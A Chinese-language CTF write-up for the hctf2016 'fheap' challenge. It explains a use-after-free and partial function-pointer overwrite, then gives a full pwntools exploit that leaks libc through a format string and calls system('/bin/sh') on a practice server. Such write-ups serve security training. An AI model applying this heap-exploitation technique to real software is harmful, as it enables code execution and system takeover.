ha1vk's blog
0%

hctf2016_fheap

发表于 分类于

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,add函数中,如果字符串长度大于15,则单独malloc一块内存存放字符串,否则直接存结点里。

Delete功能没有清空指针,因此,存在UAF,

我们可以第字节将节点里的free代理函数指针修改掉,利用低字节覆盖,使其指向printf函数plt表,这样,当我们用UAF去delete这个堆时,就会调用printf,这样我们可以利用格式化字符串去泄露数据。然后就可以利用UAF,去执行system函数了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#coding:utf8
#需要爆破4bit
from pwn import *

context.log_level = 'debug'
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

def add(size,content):
   sh.sendlineafter('3.quit','create ')
   sh.sendlineafter('size:',str(size + 1))
   sh.sendafter('str:',content + '\x00')

def delete(index):
   sh.sendlineafter('3.quit','delete ')
   sh.sendlineafter('id:',str(index))
   sh.sendlineafter('Are you sure?:','yes')

def exploit():
   add(0x10,'a'*0x10) #0
   add(0x10,'b'*0x10) #1
   delete(1)
   delete(0)
   #低字节覆盖为printf
   add(0x20,'%22$p'.ljust(0x18,'b') + p16(0x59D0)) #0
   delete(1)
   sh.recvuntil('0x')
   libc_base = int(sh.recvuntil('b',drop = True),16) - libc.symbols['_IO_2_1_stdout_']
   system_addr = libc_base + libc.sym['system']
   print 'libc_base=',hex(libc_base)
   print 'system_addr=',hex(system_addr)
   #再用同样的方法,将函数指针覆盖为system
   add(0x10,'a'*0x10) #1
   add(0x10,'b'*0x10) #2
   delete(2)
   delete(1)
   add(0x20,'/bin/sh;'.ljust(0x18,'a') + p64(system_addr))
   #getshell
   delete(2)

while True:
   try:
      global sh
      #sh = process('./pwn-f')
      sh = remote('node3.buuoj.cn',28400)
      exploit()
      sh.interactive()
   except:
      sh.close()
      print 'trying...'

sh.interactive()